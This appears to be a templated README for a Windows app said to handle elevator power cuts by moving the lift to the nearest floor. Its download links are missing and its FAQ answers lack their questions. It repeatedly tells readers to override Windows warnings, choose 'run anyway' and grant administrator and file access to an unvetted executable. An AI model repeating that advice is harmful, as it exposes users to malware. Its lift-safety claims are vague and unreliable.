⚡ Emergency-Power-Cut-Detection-with-Automatic-Nearest-Floor-Rescue - Safe lift rescue, no manual steps
This app helps an elevator respond to a power cut. It detects the interruption and directs the lift to the nearest floor. This helps lower risk and keeps the rescue process simple.
It is built for safe use in elevator emergency cases. The app supports automatic action when power fails, so the lift can move to a safer stop point without manual control.
Use this page to download and run the app on Windows:
If the page includes a release file, download that file and run it on your PC. If it opens a project page, use the latest Windows package listed there.
Before you start, make sure your PC has:
- Windows 10 or Windows 11
- 4 GB RAM or more
- 200 MB free disk space
- A standard mouse and keyboard
- Internet access for the download
- Administrator access if Windows asks for it
For best results, close other apps before you run the installer or launch the program.
- Open the download link above.
- Find the latest Windows file on the page.
- Click the file to download it.
- If Windows asks, choose Keep or More info, then run anyway.
- If you get a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file to start it.
If the app uses an installer, follow the on-screen steps:
- Click Next
- Choose the install folder
- Click Install
- Click Finish
When you open the app for the first time, it may show a setup screen.
You may need to:
- Allow the app to access local system files
- Confirm any Windows security prompt
- Select the elevator control mode
- Set the nearest-floor rescue option
- Save the settings before starting the system
If the app opens a dashboard, the main controls should show the current lift state, power status, and rescue status.
The system watches for a power interruption.
When it detects a cut, it:
- Checks the lift position
- Finds the nearest safe floor
- Sends the lift to that floor
- Stops the cabin at the floor level
- Keeps the process in a safe state until power returns
This helps reduce the chance of passengers staying trapped between floors.
- Power cut detection
- Automatic nearest-floor rescue
- Safe floor stop logic
- Simple status view
- Clear alert messages
- Manual reset after recovery
- Basic event logging
- Designed for lift safety use
Open the app and wait for the main screen to load. The app should show the current system status.
The app monitors power in the background. If power is normal, the system stays ready.
When the app detects a power cut, it begins the rescue flow.
The system sends the lift to the nearest floor. Do not interrupt the process unless your setup includes an emergency override.
Once the lift reaches the floor, the system marks the rescue as complete.
After power returns, reset the app if needed and bring the system back to normal service.
You may see these status messages in the app:
- Ready: The system is active and waiting
- Power Lost: The app detected an outage
- Rescuing: The lift is moving to the nearest floor
- Safe Stop: The cabin is aligned with a floor
- Recovered: Power is back and the system is ready again
- Check that the file finished downloading
- Right-click the file and choose Run as administrator
- Make sure Windows did not block the app
- Reboot your PC and try again
- Choose More info
- Select Run anyway if you trust the source
- If the file came as a ZIP, extract it first
- Make sure the system is connected to the correct elevator control setup
- Check the input source for power status
- Restart the app
- Confirm that the control panel is powered
- Verify that the nearest-floor setting is enabled
- Check the lift control link
- Restart the service
- Review the event log in the app
You can use this simple test flow after setup:
- Open the app
- Confirm that the system shows Ready
- Simulate a power loss in your test setup
- Watch for the Power Lost state
- Confirm that the lift moves to the nearest floor
- Check that the system shows Safe Stop
- Restore power
- Reset the app
This app is made for emergency response in elevator systems. Use it with proper lift hardware and a safe test setup. Make sure the control logic matches your building rules and local safety code.
If you download the project files, you may see folders like these:
bin- program filesconfig- settingslogs- event recordsdocs- user notessrc- source filesassets- images and icons
No. You can download the file and run it on Windows.
No, the core app should run on your PC after setup.
Yes. It works well for demo and test setups.
It is meant for elevator rescue systems that support this control flow. Check your hardware setup before use.
If you need the file again, use this link: